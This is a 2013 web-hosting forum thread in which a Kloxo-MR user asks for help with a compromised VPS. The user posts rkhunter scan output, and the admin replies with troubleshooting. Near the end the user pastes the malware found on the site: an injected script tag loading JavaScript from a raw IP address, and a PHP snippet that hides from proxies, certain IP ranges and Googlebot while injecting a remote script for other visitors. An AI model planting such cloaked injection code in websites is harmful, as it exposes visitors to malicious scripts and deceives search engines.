Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2017-05-25, 23:42:33

Author Topic: Security Problems  (Read 9752 times)

0 Members and 1 Guest are viewing this topic.

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Security Problems
« on: 2013-02-24, 04:14:06 »
Someone is modifying files and mysql database on vps, the first time it modified files and stopped, after from mysql, and now again files, i changed the password, an switched to kloxo-mr, but and not fixed, he can don from my php script that?

[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter version... [0;39m
  This version  : 1.4.0
  Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter data files... [0;39m
  Checking file mirrors.dat [34C[  [1;32mNo update [0;39m ]
  Checking file programs_bad.dat [29C[  [1;32mNo update [0;39m ]
  Checking file backdoorports.dat [28C[  [1;32mNo update [0;39m ]
  Checking file suspscan.dat [33C[  [1;32mNo update [0;39m ]
  Checking file i18n/cn [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/de [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/en [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh.utf8 [33C[  [1;32mNo update [0;39m ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
         File: /etc/rkhunter.conf
         Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
         Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
         Current size: 37361    Stored size: 37357
         Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
         Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
         /proc/modules output:
         lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
         SSH configuration option 'PermitRootLogin': yes
         Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
         /dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #1 on: 2013-02-24, 09:25:52 »
You can attach files here with warning 'Bourne-Again shell script text executable' and 'perl script text executable'.

I want compare with my own systems.

Better update your Kloxo-MR and then inform here your system with run 'sh /script/sysfo'
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #2 on: 2013-02-24, 17:17:01 »
sh /script/sysfo
sh: /script/sysfo: No such file or directory
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #3 on: 2013-02-24, 17:26:46 »
You need update to Kloxo-MR latest version if didn't found '/script/sysinfo'.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #4 on: 2013-02-24, 17:41:55 »
Look like content of ifdown and other files as the same as in my servers.

It's as 'false positive'.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 3,888
  • Karma: +1/-0
    • View Profile
Re: Security Problems
« Reply #5 on: 2013-02-24, 20:01:14 »
Yes, got the same. Just look for rootkits.
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #6 on: 2013-02-24, 20:18:09 »
the rootkit scan is was clean
how i update?
Current Version:   6.5.0.c.2013021802
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #7 on: 2013-02-24, 20:25:10 »
Quote from: "costa1988sv"
the rootkit scan is was clean
how i update?
Current Version:   6.5.0.c.2013021802
Read viewtopic.php?f=4&t=644
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #8 on: 2013-02-25, 05:34:44 »
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
   1. MySQL: mysql-5.0.96-1
   2. PHP: php53u-5.3.21-1.ius.el5
   3. Httpd: httpd-2.2.23-3.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: nginx-1.3.13-1.el5
   6. Qmail: qmail-1.03-1.5.15

D. Php-type (for Httpd/proxy): php-fpm_worker

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2048        805       1242          0          0          0
   -/+ buffers/cache:        805       1242
   Swap:            0          0          0

i installed new versioan and i get random 500 error an content encode error
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #9 on: 2013-02-25, 05:54:53 »
switched to event an no more errors
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #10 on: 2013-02-25, 07:02:48 »
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

my script is 200% more faster , but wordpress is 25% slower
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #11 on: 2013-02-25, 07:39:34 »
Quote from: "costa1988sv"
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

my script is 200% more faster , but wordpress is 25% slower
It's not 'Security Problems'.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #12 on: 2013-02-25, 18:40:00 »
today, he modified a text file, what i use with include
he added at the end
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline costa1988sv

  • Junior Member
  • *
  • Posts: 40
  • Karma: +0/-0
    • View Profile
Re: Security Problems
« Reply #13 on: 2013-02-25, 18:46:02 »
and in php files
Code: [Select]
error_reporting(0);
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);
if(strlen($_SERVER['HTTP_REFERER']))
{
    $referer = parse_url($_SERVER['HTTP_REFERER']);
    $referer['host'] = str_replace("www.", "", strtolower($referer['host']));

}
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222"  , "125" ,
"202"  , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
 "87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
 "164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
if (  $_SERVER['HTTP_X_FORWARDED_FOR']
   || $_SERVER['HTTP_X_FORWARDED']
   || $_SERVER['HTTP_FORWARDED_FOR']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED']
   || $_SERVER['HTTP_VIA']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED_FOR_IP']
   || $_SERVER['VIA']
   || $_SERVER['X_FORWARDED_FOR']
   || $_SERVER['FORWARDED_FOR']
   || $_SERVER['X_FORWARDED']
   || $_SERVER['FORWARDED']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['FORWARDED_FOR_IP']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['HTTP_PROXY_CONNECTION'])
{
 echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){
if (in_array($ip222, $iptarget)) {
echo "";
 } elseif (in_array($useragent111, $ugtarget)){
echo "";

} elseif (!in_array($referer['host'], $rfbad)){
//echo "<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>";
//echo "<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>";
echo "<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>";
}
}
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 14,483
  • Karma: +105/-8
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Security Problems
« Reply #14 on: 2013-02-25, 18:46:39 »
Questions:

1. Install Kloxo-MR with fresh install or update from Kloxo Official?
2. Attack by hacker for all domains or just certain domain?
3. What app (wordpress and etcetera) for your domain where attacked?
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

 


Top 4 Global Search Engines:    Google    Bing    Baidu    Yahoo
Click Here

Page created in 0.042 seconds with 18 queries.

web stats analysis